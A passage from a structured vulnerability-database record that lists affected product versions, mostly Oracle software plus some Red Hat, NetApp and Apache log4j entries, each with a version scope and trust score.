"oracle", version: "13.1", }, { model: "retail extract transform and load", scope: "eq", trust: 1.3, vendor: "oracle", version: "13.0", }, { model: "retail advanced inventory planning", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 1.3, vendor: "oracle", version: "9.2", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.0", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.1", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.0", }, { model: "insurance calculation engine", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.2.1", }, { model: "insurance calculation engine", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.1.1", }, { model: "identity management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "identity management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.2.3.0", }, { model: "identity analytics", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.5.8", }, { model: "goldengate application adapters", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.3.2.1.1", }, { model: "flexcube investor servicing", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.0.4", }, { model: "configuration manager", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.2.0.5", }, { model: "configuration manager", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.2.0.2", }, { model: "communications service broker", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.0", }, { model: "communications pricing design center", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.0", }, { model: "communications pricing design center", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1", }, { model: "communications online mediation controller", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.1", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.4.0", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "api gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.2.4.0", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "financial services lending and leasing", scope: "lte", trust: 1, vendor: "oracle", version: "14.8.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "17.12.7", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "6.1.1", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.0", }, { model: "insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "10.1", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "16.2.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0", }, { model: "enterprise linux server", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "endeca information discovery studio", scope: "eq", trust: 1, vendor: "oracle", version: "3.2.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.4", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "6.7", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0.5", }, { model: "insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "11.0", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "10.0", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7.0.0", }, { model: "communications network integrity", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.6", }, { model: "mysql enterprise monitor", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "communications interactive session recorder", scope: "lte", trust: 1, vendor: "oracle", version: "6.2", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.5", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.0", }, { model: "communications network integrity", scope: "gte", trust: 1, vendor: "oracle", version: "7.3.2", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.4", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.1.0.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "service level manager", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.1", }, { model: "fuse", scope: "eq", trust: 1, vendor: "redhat", version: "1.0", }, { model: "enterprise linux server eus", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: "enterprise manager for oracle database", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.2", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "15.0", }, { model: "enterprise linux server eus", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "instantis enterprisetrack", scope: "gte", trust: 1, vendor: "oracle", version: "17.1", }, { model: "enterprise linux server eus", scope: "eq", trust: 1, vendor: "redhat", version: "7.5", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "6.0", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3", }, { model: "retail open commerce platform", scope: "eq", trust: 1, vendor: "oracle", version: "6.0.0", }, { model: "enterprise manager for mysql database", scope: "lte", trust: 1, vendor: "oracle", version: "13.2.2.0.0", }, { model: "enterprise manager for oracle database", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0.8", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.5", }, { model: "financial services behavior detection platform", scope: "eq", trust: 1, vendor: "oracle", version: "6.1.1", }, { model: "utilities work and asset management", scope: "eq", trust: 1, vendor: "oracle", version: "1.9.1.2.12", }, { model: "retail open commerce platform", scope: "eq", trust: 1, vendor: "oracle", version: "5.3.0", }, { model: "retail clearance optimization engine", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.5", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.6", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.7", }, { model: "enterprise linux desktop", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "oncommand insight", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.0.0", }, { model: "mysql enterprise monitor", scope: "gte", trust: 1, vendor: "oracle", version: "3.4.0.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.3", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0", }, { model: "enterprise linux server aus", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.3.0.0", }, { model: "enterprise linux server aus", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.6", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.0.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.7", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 1, vendor: "oracle", version: "4.0.1.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.2", }, { model: "goldengate", scope: "eq", trust: 1, vendor: "oracle", version: "12.3.2.1.1", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.5", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.1.1", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.1", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.1.1.1", }, { model: "log4j", scope: "lt", trust: 1, vendor: "apache", version: "2.8.2", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "16.2.11", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.3", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "12.4.0", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.10", }, { model: "autovue vuelink integration", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.0", }, { model: "policy automation connector for siebel", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.6", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.1", }, { model: "snapcenter", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "in-memory performance-driven planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: "financial services profitability management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.1", }, { model: "enterprise data quality", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.5", }, { model: "oncommand workflow automation", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "communications converged application server - service controller", scope: "eq", trust: 1, vendor: "oracle", version: "6.1", }, { model: "communications instant messaging server", scope: "eq", trust: 1, vendor: "oracle", version: "10.0.1.3.0", }, { model: "financial services behavior detection platform", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "timesten in-memory database", scope: "eq", trust: 1, vendor: "oracle", version: "11.2.2.8.49", }, { model: "enterprise linux workstation", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "17.12.0", }, { model: "identity manager connector", scope: "eq", trust: 1, vendor: "oracle", version: "9.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.10", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.7", }, { model: "financial services profitability management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7.0.0", }, { model: "retail extract transform and load", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.3", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.2", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.9", }, { model: "autovue vuelink integration", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.1", }, { model: "financial services lending and leasing", scope: "gte", trust: 1, vendor: "oracle", version: "14.1.0", }, { model: "in-memory performance-driven planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.1", }, { model: "mysql enterprise monitor", scope: "gte", trust: 1, vendor: "oracle", version: "4.0.0.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.3.0.2", }, { model: "oncommand api services", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "instantis enterprisetrack", scope: "lte", trust: 1, vendor: "oracle", version: "17.3", }, { model: "fusion middleware mapviewer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.2", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "10.3.6.0.0", }, { model: "financial services behavior detection platform", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.4.0.0", }, { model: "fusion middleware mapviewer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3", }, { model: "storage automation store", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "enterprise linux server tus", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: "enterprise linux server tus", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.5", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.9", }, { model: "retail advanced inventory planning", scope: "eq", trust: 1, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.7", }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: "communications messaging server", scope: "lt", trust: 1, vendor: "oracle", version: "8.0.2", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "4.0.4.5235", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.8", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1", }, { model: "soa suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.2.0.0", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.0", }, { model: "insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "10.2", }, { model: "communications webrtc session controller", scope: "lt", trust: 1, vendor: "oracle", version: "7.2", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "15.0", }, { model: "financial services regulatory reporting with agilereporter", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.9.2.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0.5", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "7.3.3.0.0", }, { model: "financial services lending and leasing", scope: "eq", trust: 1, vendor: "oracle", version: "12.5.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "application testing suite", scope: "eq", trust: 1, vendor: "oracle", version: "13.3.0.1", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.8", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.0.8131", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "3.4.7.4297", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "12.3.0", }, { model: "communications interactive session recorder", scope: "gte", trust: 1, vendor: "oracle", version: "6.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "peoplesoft enterprise fin install", scope: "eq", trust: 1, vendor: "oracle", version: "9.2", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "10.2", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.0", }, { model: "log4j", scope: "eq", trust: 0.8, vendor: "apache", version: "2.8.2", }, { model: "log4j", scope: "lt", trust: 0.8, vendor: "apache", version: "2.x", }, { model: "jboss web server for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "3.17", }, { model: "jboss web server for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "3.16", }, { model: "enterprise linux workstation optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux workstation", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux workstation", scope: "eq", trust: 0.3, vendor: "redhat", version: "6", }, { model: "enterprise linux server optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux server eus", scope: "eq", trust: 0.3, vendor: "redhat", version: "7.3", }, { model: "enterprise linux server", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux server", scope: "eq", trust: 0.3, vendor: "redhat", version: "6", }, { model: "enterprise linux computenode optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux computenode", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux client optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux client", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.3", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "webcenter portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.11", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.3", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.1", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1.6", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.6", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0.11", }, { model: "retail workforce management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.64", }, { model: "retail workforce management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.60.7", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2.9", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.9", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0.7", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.12", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.9", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.8", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail point-of-service", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail point-of-service", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail order management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "retail order management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.7", }, { model: "retail order management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.5", }, { model: "retail order management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail open commerce platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "retail open commerce platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.3", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2", }, { model: "retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail fiscal management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail eftlink", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0.3", }, { model: "retail eftlink", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.2", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.4", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "retail convenience and fuel pos", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.132", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail assortment planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0.1", }, { model: "retail assortment planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.3", }, { model: "retail assortment planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail advanced inventory planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail advanced inventory planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail advanced inventory planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "peoplesoft enterprise fin supply chain portal pack brazil", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "peoplesoft enterprise fin supply chain portal pack argentina", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "micros lucas", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.9.5", }, { model: "managed file transfer", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "managed file transfer", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2.0", }, { model: "managed file transfer", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jd edwards world security a9.4", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jd edwards world security a9.3", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jd edwards world security a9.2", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.4", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "flexcube core banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.7", }, { model: "flexcube core banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.6", }, { model: "flexcube core banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.5", }, { model: "enterprise repository", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "enterprise repository", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise linux", scope: "eq", trust: 0.3, vendor: "oracle", version: "7", }, { model: "endeca server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.7", }, { model: "endeca information discovery integrator", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "endeca information discovery integrator", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications unified inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications unified inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "communications unified inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications services gatekeeper", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications services gatekeeper", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "communications network intelligence", scope: "eq", trust: 